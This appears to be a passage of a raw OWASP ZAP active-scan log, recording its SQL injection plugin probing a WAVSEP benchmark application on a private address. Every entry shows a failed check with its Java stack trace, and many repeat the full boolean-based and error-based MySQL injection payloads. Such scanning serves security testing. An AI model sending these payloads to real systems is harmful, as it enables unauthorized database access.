9948=9948 AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962719 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%' AND 7057=3111 AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%' AND 7057=3111 AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962731 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp AND 8384=3765-- xvlE] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp AND 8384=3765-- xvlE at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962732 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp AND 1050=1050-- MSLZ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp AND 1050=1050-- MSLZ at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962735 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp AND 8384=3765-- xvlE] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp AND 8384=3765-- xvlE at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962737 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CASE WHEN (5563=4985) THEN 5563 ELSE 5563*(SELECT 5563 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/(SELECT (CASE WHEN (5563=4985) THEN 5563 ELSE 5563*(SELECT 5563 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962738 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CASE WHEN (3675=3675) THEN 3675 ELSE 3675*(SELECT 3675 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/(SELECT (CASE WHEN (3675=3675) THEN 3675 ELSE 3675*(SELECT 3675 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962739 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CASE WHEN (5563=4985) THEN 5563 ELSE 5563*(SELECT 5563 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/(SELECT (CASE WHEN (5563=4985) THEN 5563 ELSE 5563*(SELECT 5563 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962741 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp) AND (SELECT 9606 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(9606=9606,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (8714=8714] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp) AND (SELECT 9606 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(9606=9606,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (8714=8714 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962742 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp AND (SELECT 1163 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(1163=1163,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp AND (SELECT 1163 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(1163=1163,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962744 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp') AND (SELECT 6717 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(6717=6717,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('SDec'='SDec] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp') AND (SELECT 6717 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(6717=6717,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('SDec'='SDec at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962746 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp' AND (SELECT 1384 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(1384=1384,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'pjxA'='pjxA] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp' AND (SELECT 1384 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(1384=1384,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'pjxA'='pjxA at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962748 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%' AND (SELECT 3579 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(3579=3579,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%' AND (SELECT 3579 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(3579=3579,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962750 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp AND (SELECT 8954 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(8954=8954,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- nIIm] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp AND (SELECT 8954 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(8954=8954,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- nIIm at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at 